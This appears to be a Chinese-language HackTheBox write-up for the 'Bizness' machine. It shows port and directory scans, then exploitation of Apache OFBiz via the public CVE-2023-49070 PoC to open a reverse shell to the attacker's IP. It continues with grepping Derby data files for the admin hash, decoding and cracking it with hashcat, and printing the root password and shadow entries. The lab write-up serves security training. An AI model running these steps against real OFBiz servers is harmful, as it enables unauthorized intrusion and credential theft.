Bizness - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Bizness
• 10.10.11.252

端口扫描

22,80,443,8888:

$ nmap -sC -sV 10.10.11.252
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-08 13:38 CST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.35% done; ETC: 13:38 (0:00:42 remaining)
Nmap scan report for 10.10.11.252
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp   open  http            nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp  open  ssl/http        nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_http-title: Did not follow redirect to https://bizness.htb/
| tls-alpn:
|_  http/1.1
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_  http/1.1
8888/tcp open  sun-answerbook?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.18 seconds

80/443

需要加hosts：

10.10.11.252 bizness.htb

基于Apache OFBiz的一个官网：

目录扫描

目录扫描可以发现contro,进一步扫描发现一些页面l：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u https://bizness.htb/ -k --exclude-length 0

/control              (Status: 200) [Size: 34633]
/index.html           (Status: 200) [Size: 27200]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u https://bizness.htb/control/ -k --exclude-length 0 --exclude-length 34600-34700

/help                 (Status: 200) [Size: 10756]
/login                (Status: 200) [Size: 11060]
/main                 (Status: 200) [Size: 9308]
/logout               (Status: 200) [Size: 10756]
/view                 (Status: 200) [Size: 9308]
/views                (Status: 200) [Size: 9308]

访问这些页面，页面右下角得到版本号，18.12:

OFBiz

搜索可以发现OFBiz相关漏洞：

• CVE-2023-49070 Exploit Detection: A Critical Pre-Auth RCE Vulnerability in Apache OFBiz - SOC Prime
  https://socprime.com/blog/cve-2023-49070-exploit-detection-a-critical-pre-auth-rce-vulnerability-in-apache-ofbiz/
• Apache OFBiz漏洞 CVE-2023-49070 的前世今生
  https://mp.weixin.qq.com/s/iAvitO6otPdHSu1SjRNX3g
• abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
  https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC

修改代码中java和ysoserial的路径，然后一键打到ofbiz shell：

payload=subprocess.check_output(["/usr/local/Cellar/openjdk@11/11.0.20/bin/java","-jar","/Users/miao/Tools/exploit-framework/ysoserial-master-SNAPSHOT.jar","CommonsBeanutils1",arg])

if not os.path.exists("/Users/miao/Tools/exploit-framework/ysoserial-master-SNAPSHOT.jar"):

python3 exploit.py https://bizness.htb/ shell 10.10.16.3:4444

user flag

ofbiz用户目录得到user flag，并且也可以写公钥方便后续操作：

信息

这里两种方式，一种是从数据库获取，也可以直接从runtime dat中获取，得到admin的hash：

ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ grep -iRna password *
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ grep -iRna currentPassword *

c54d0.dat:21:                <eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>

得到的hash是加盐的SHA1,salt就是d，可以注意到不是标准base64,这是url safe的base64,简单转换即可：

• base64编码以及url safe base64是怎么工作的? - 世有因果知因求果 - 博客园
  https://www.cnblogs.com/kidsitcn/p/6901431.html

$ python3 decode.py
b8fd3f41a541a435857a8f3e751cc3a91c174362:d

然后得到的hash破解出来密码：

$ sudo hashcat -m 120 hash.txt ~/Tools/dict/rockyou.txt

b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness

decode.py

import base64
url_safe_base64_hash = "uP0_QaVBpDWFeo8-dRzDqRwXQ2I"
standard_base64_hash = url_safe_base64_hash.replace('-', '+').replace('_', '/')
padding_needed = 4 - len(standard_base64_hash) % 4
if padding_needed:
    standard_base64_hash += "=" * padding_needed
try:
    decoded_bytes = base64.b64decode(standard_base64_hash)
    hex_hash = decoded_bytes.hex()
except Exception as e:
    hex_hash = str(e)
hex_hash_with_suffix = hex_hash + ":d"
print(hex_hash_with_suffix)

root flag

得到的密码就是root 密码,不能ssh登录，之前通过ofbiz那里切换即可：

monkeybizness

shadow

root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::
ofbiz:$y$j9T$0io/BiTgsGfXITtrQxine1$0PO2rHmI9H46z/uQszVpMm1V7UTYvB5lVh8.Vcx/Nt/:19709:0:99999:7:::

参考资料

• CVE-2023-49070 Exploit Detection: A Critical Pre-Auth RCE Vulnerability in Apache OFBiz - SOC Prime
  https://socprime.com/blog/cve-2023-49070-exploit-detection-a-critical-pre-auth-rce-vulnerability-in-apache-ofbiz/
• Apache OFBiz漏洞 CVE-2023-49070 的前世今生
  https://mp.weixin.qq.com/s/iAvitO6otPdHSu1SjRNX3g
• abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
  https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC
• base64编码以及url safe base64是怎么工作的? - 世有因果知因求果 - 博客园
  https://www.cnblogs.com/kidsitcn/p/6901431.html